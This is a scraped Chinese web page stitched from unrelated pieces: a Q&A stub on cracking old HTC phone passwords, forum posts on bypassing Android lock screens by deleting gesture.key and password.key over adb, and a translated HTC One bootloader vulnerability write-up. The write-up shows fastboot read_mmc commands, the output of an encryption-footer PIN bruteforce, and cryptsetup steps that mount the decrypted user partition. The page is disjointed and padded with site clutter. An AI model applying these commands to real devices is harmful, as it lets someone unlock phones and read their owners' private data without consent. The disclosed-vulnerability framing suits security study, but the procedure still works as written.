hTC型号的htc手机老款型号大全密码怎样破解

jeepont手机怎么破解开机密码
现实版的碟中谍,潜伏10年只为HTC核心技术。。&
该内容由系统自动生成
参考价:¥759.00
主屏尺寸4.7英寸
电池容量2300mAh
主屏分辨率像素
后置摄像头400万像素
CPU频率1.7GHz
前置摄像头210万像素
CPU类型高通 骁龙600
名网友点评分数
微信公众账号ZOL问答堂
关注微信,随时随地解答您的疑惑
ZOL问答堂官方微博@ZOL问答堂
关注成功!该问题被回答后,将给您发送站内短信。
您也可以通过关注问答堂微信,及时获得您关注问题的回答。
微信关注问题方法“”帖子很冷清,卤煮很失落!求安慰
手机签到经验翻倍!快来扫一扫!
3种解决安卓手机锁屏密码忘记的方法!
9716浏览 / 12回复
3种解决安卓锁屏密码忘记的方法!
方法一:ADB解锁 点击下载ADB解锁工具
必要条件:USB调试模式为打开状态(MIUI系统默认打开)
1、手机连接,确定已安装ADB(方法:),解压ADB工具包至C盘
2、打开cmd输入 cd c:adb(打开adb所在目录)
3、接着输入adb shell
4、继续输入cd datasystem
5、输入ls查看datasystem中的文件,如果设置了密码会有gesture.key或者password.key
6、若设置的是图案密码请继续输入命令:rm gesture.key,若设置的是单纯密码请输入命令:rm password.key
7、输入reboot命令或者手动重启手机生效,或者现在直接滑动解锁,任意密码都可解锁,建议重启。(如下图)
方法二:Google账号解锁
必要条件:被锁机器之前设置、登录了google账号,账号密码已知,且手机可以联网。
1、随意5次输入密码,系统提示5次输入错误,30S后重试;
2、此时解锁界面下方会提示“忘记密码”,点击输入之前设置过的Google账号和密码即可立即解锁。
方法三:清空数据解锁
优点:无任何限制条件,适用于没有重要资料的用户。
1、关机状态下同时按住开机键+音量加键,进入recovery。
2、依次选择简体中文-清空数据-清空用户数据,重启进入系统,此操作只删除用户数据,软件得以保留。
1、设置Google账户,在联网情况下验证
设置Google账户,在解锁界面没有“忘记密码”选项,只有在5次输错后才会提示,点击并输入账号密码,可清除锁屏密码,此时如手机没有联网,则不能登陆解锁。
如不点击“忘记密码”,连续错误输入20次后,登陆界面自动弹出,此时只有登陆Google账户才能立即解开,重启后仍是此登陆界面,如登陆账户,效果同样是清除了登录密码。
2、无Google账户情况下测试
连续输错5次后没有“忘记密码”图标,继续错误输入,直至25次,仍仅提示30S后重新输入。
【总结与体会】
1、方法一要求打开usb调试,且手机已获得root权限;方法二要求设置了已知的Google账户,且手机可以联网。方法三没有要求,但是是一种暴力解锁。
2、定期对重要信息做备份,以防各种意外;设置锁屏密码后关闭USB调试,防止别人用以上方法破解密码窃取个人信息;一定要在本机上设置同步Google账号,同时开启网络.
好!可以一试啊!
对 楼主 zuzhili 说:=========================很实用的方法
谢谢楼主分享
这个必须得到
adb在哪里啊 》 也不给传上来。。。
中型车中小城镇
啊继续开始卡了下两口就落下
对 楼主 zuzhili 说:=========================相当好
输入ls查看datasystem中的文件,如果设置了密码会有gesture.key或者password.key
请注意这个命令这个是LS
在哪下载adb
您需要登录后才可以回帖&&&|&&&&&
用户名/注册邮箱/注册手机号
其他第三方号登录& 利用HTC One漏洞破解手机PIN密码
利用HTC One漏洞破解手机PIN密码
时间:  来源:互联网  阅读次数:1939  小编:  我要分享:
HTC One手机运行的是Android 4.2.2、HBOOT 1.54.0000,它存在一个名为Bootloader的漏洞。这个漏洞早在2014年2月份就报告给了HTC官方,并在次月就修复了该漏洞。在得到HTC官方同意后,我们现在就将整个漏洞利用测试过程发布出来。
read_emmc命令在2011发布的HTC DesireZ手机中也曾出现过。这个命令允许攻击者访问手机内存,并可能获取短信、联系人等敏感信息。
此外,这条命令允许攻击者通过bruteforce自动获取手机PIN/passcode。他会打开一个额外的缺口防止用户定义易猜解的PIN/passcode(比如说就4个数字的PIN)。这是常有的事情,因为日常解锁手机也是可以使用PIN/passcode的。
这个攻击仅限于HTC One手机且还得开启全盘加密,也就是说手机由安卓加密保护。
read_emmc命令在部分HTC手机中似乎是一个用来调试的命令。在我们看来,这条命令不应该出现在用户手机上。
这篇文章描述了HTC One在安卓全盘加密上的强悍安全机制(AES加密, 合理的密钥长度, salt)&。
将HTC One关机然后插入电脑,然后进入fastboot模式(关机状态按住音量+键以及开机键,然后放开开机键),这样我们可以从HBOOT进入fastboot模式。
到了这里,我们就可以利用fastboot进行读取内存操作了,命令如下:
commandformat:&
read_mmc&[emmc/sd]&[start]&[#blocks]&[#blocks/read]&[show]
我们来看看参数的定义:
第一个参数,告诉机器从哪里读取。“emmc”是读取闪存,“sd”是读取内存卡
#blocks: 读取块的数量
#blocks/read:一次读取块的数量
show:设置成1来显示结果
读取第一个扇区,可以使用如下命令
$fastboot&oem&read_mmc&emmc&0&1&1&1
(bootloader)&reading&sector&0&~&0
(bootloader)&0
(bootloader)&0
(bootloader)&DF
(bootloader)&FF
(bootloader)&3
(bootloader)&0
(bootloader)&20
(bootloader)&E0
(bootloader)&9F
(bootloader)&3
(bootloader)&55
(bootloader)&AA
(bootloader)&read&sector&done&average&=&172
OKAY&[&&0.310s]
finished.&total&time:&0.311s
从头开始看,我们可以看到许多的0(超过400字节),其结尾是“55 AA”&。
在手机上使用ADB Shell,我们可以看到用户的数据分区块“mmcblk0p37”是从6422528开始的。在安卓下它与挂载的ext4分区对应
shell@android#cat&/proc/emmc
dev:&&&&&&&&size&&&&&erasesize&name
mmcblk0p37:&000200&"userdata"
shell@android:#&cat&/sys/block/mmcblk0/mmcblk0p37/start
shell@android:#&mount
/dev/block/mmcblk0p37&/data&ext4&rw,nosuid,nodev,noatime,discard,noauto_da_alloc,data=ordered&0&0
因此,攻击者可以使用“read_mmc”&命令,在闪存中浏览用户数据分区中的内容,即使用户设定了PIN/密码都无法阻止。
$fastboot&oem&read_mmc&emmc&&1&1
(bootloader)&reading&sector&6422530&~&6422530
(bootloader)&0
(bootloader)&2F
(bootloader)&64
(bootloader)&61
(bootloader)&74
(bootloader)&61
(bootloader)&read&sector&done&average&=&146
OKAY&[&&0.359s]
finished.&total&time:&0.359s
“2F 64 61 74 61”字节序列是位于用户数据分区开始的“/data” ASCII字符串。
我们的第一个想法就是实现从闪存将用户数据进行转储,然而这个过程需要几天甚至是几个月时间。
另一个想法是利用FUSE(用户空间的文件系统)通过USB连接电脑转储用户数据。
绕过安卓全盘加密(PDE)
在HTC Desire Z( Android 2.x)时代还没有出现全盘加密,我们现在考虑是否有办法绕过PDE,使用“read_mmc”漏洞。
ThomasCannon在2012年Defcon大会上向我们演示了PDE工作过程,使用&bruteforce破解PIN/passcode以及解密用户扇区数据的脚本。在那个时候,他使用的是Google Nexus S纯原生,与这里这个例子稍有不同。
我们决定对设备进行加密,“存储>手机存储加密”。通过其方法,我们注意到出现了一个额外的分区,这个分区就是用来存储密钥的。
$hexdump&-C&extra&
&&c4&b1&b5&d0&01&00&00&00&&68&00&00&00&00&00&00&00&|........h.......|
&00&00&00&00&00&00&00&&00&00&40&03&00&00&00&00&&|.........@.....|
&00&00&00&61&65&73&2d&&63&62&63&2d&65&73&73&69&|....aes-cbc-essi|
&3a&73&68&61&32&35&36&&00&00&00&00&00&00&00&00&|v:sha256........|
&00&00&00&00&00&00&00&&00&00&00&00&00&00&00&00&|................|
&00&00&00&00&00&00&00&{15&d2&9c&16&1c&54&40&1c&|.............T@.|
&&b4&c1&e4&91&69&10&4b&55&&2e&47&64&31&13&52&ad&2d&|....i.KU.Gd1.R.-|
&&bd&8c&42&8e&d6&c4&84&00}&00&00&00&00&00&00&00&00&|..B.............|
&00&00&00&00&00&00&00&&00&00&00&00&00&00&00&00&|................|
&&00&00&00&00&00&00&00&00&[c7&1f&34&80&97&09&fd&39&|..........4....9|
&&0b&4a&91&d9&d9&d8&00&cd]&00&00&00&00&00&00&00&00&|.J..............|
&&00&00&00&00&00&00&00&00&&00&00&00&00&00&00&00&00&|................|
Note: 对主密钥及内部数据解密,推荐大家看看Thomas的幻灯片。
我们正好处于加密头的位置,于是我可以很快得到
shell@android#cat&/proc/emmc
dev:&&&&&&&&size&&&&&erasesize&name
mmcblk0p27:&00200&"extra"
shell@android:#&cat&/sys/block/mmcblk0/mmcblk0p27/start
然后,我们可以再次确认用户数据分区被加密。第一个字节告诉我们,“This is an encrypted device:)”,这仅仅是在HTC One中才有的。他之所以能这么写,是因为在默认的ext4分区中第一个字节并没有使用,其他字节都是随机字节。
shell@android:#./busybox&hexdump&-C&/dev/block/mmcblk0p37&-n&64
&68&69&73&20&69&73&20&&61&6e&20&65&6e&63&72&79&|This&is&an&encry|
&74&65&64&20&64&65&76&&69&63&65&3a&29&6f&c3&a0&|pted&device:)o..|
&bc&76&ed&a8&77&ef&6a&&95&28&32&ab&24&ce&8d&58&|&.v..w.j.(2.$..X|
&fe&8e&14&9e&81&05&a4&&28&65&64&3c&1b&e2&11&56&|........(ed<...V|
接着,我们可以确定能够访问这个头,使用fastboot 中“read_mmc”&命令对用户数据分区进行加密
$fastboot&oem&read_mmc&emmc&&1&1
由此,我们可以编写一个小脚本来读取PDE头,用户数据分区的第一个扇区然后通过电脑进行破解。
#python&bruteforce_htcone_over_reademmc.py
oem&read_mmc&emmc&&1&1
oem&read_mmc&emmc&&1&1
Footer&File&&&&:&extra
Magic&&&&&&&&&&:&0xD0B5B1C4
Major&Version&&:&1
Minor&Version&&:&0
Footer&Size&&&&:&104&bytes
Flags&&&&&&&&&&:&0x
Key&Size&&&&&&&:&256&bits
Failed&Decrypts:&0
Crypto&Type&&&&:&aes-cbc-essiv:sha256
Encrypted&Key&&:0x15D29C161C5EEAD2DBD8C428ED6C48400
Salt&&&&&&&&&&&:&0xC71F0B4A91D9D9D800CD
----------------
Trying&to&Bruteforce&Password...&please&wait
Found&PIN!:&0000
Saving&decrypted&master&key&to&'keyfile'
挂载用户数据加密分区
攻击者可以通过上文轻松获取PIN/passcode,他能正常接通电话,重写或者创建PIN/passcode,然后开启ADB,做他想做的任何事。
#mkdir&mnt
#&losetup&/dev/loop0&userdata.img
#&cryptsetup&Ctype&plain&open&Cc&aes-cbc-essiv:sha256&Cd&keyfile&/dev/loop0userdata
#&mount&/dev/mapper/userdata&mnt
在这个例子上,我们甚至可以通过USB在电脑上执行“read_mmc” 命令。
关注IT新闻资讯,了解最新的IT动态,扫描&&二维码&&
好特网,阅读的好地方!
  王者荣耀新春秘宝的活动内容可谓是此次新春活动中的亮点,其中奖励最为丰厚的就是此次…
  在上古世纪起源手游等级意味着自身实力的强弱,而且等级还能解锁一些功能。那么上古世…
好特网精选
大家都在看什么
网友在23秒点赞了
网友在7分钟点赞了
网友在13分钟点赞了
网友在14分钟点赞了
网友在25分钟点赞了
大小:0 Bytes
大小:0 Bytes
大小:0 Bytes
大小:0 Bytes
大小:0 Bytes
大小:3.13 MB
大小:6.43 MB
大小:36.03 MB
大小:30.43 MB
大小:41.5 MB
大小:45.13 MB
大小:103.1 MB
大小:6.81 MB
大小:268.4 MB
大小:80.5 MB
扫一扫二维码进入好特网手机版本!15:44:0513958
我的密码锁/图案锁忘记了怎么办?
相信你去求助,各种支招都会有吧。
不过基本上都是说要双Wipe。可是Wipe后应用和设置都不见了,还得一个个找回来,多麻烦~
所以在这里给大家支一招,不用root,也不用双Wipe,轻松解图形锁~各种机型均适用。
当然,需要你的电脑上有adb并能连接设备(就是你忘记密码锁或图案锁之前有打开了USB调试)
连接设备后,双击打开 解压得到的 CMD.exe 文件
接着CMD会加载一堆代码,等两秒钟,运行完毕后,
接着再输入:
adb shell rm /data/system/gesture.key如图:
回车!~然后等待就可以了
这时候屏幕的图案锁/密码锁,已经清空了,这时候解锁还有这个图形锁界面,这里随便画个图案都行!
解开之后,去到设置,把“安全 - 屏幕锁定”设置成“无”即可!
本帖有隐藏内容,需要感谢楼主之后才能查看哦!点击快捷回复: 谢楼楼主!楼主威武!
我只是路过打酱油,楼主莫怪!嘿嘿!
支持技术大神,感谢无私奉献的楼主!
您需要注册登录后,才能回帖哦!
快速登录:}

我要回帖

更多关于 htc m7 怎么破解密码 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信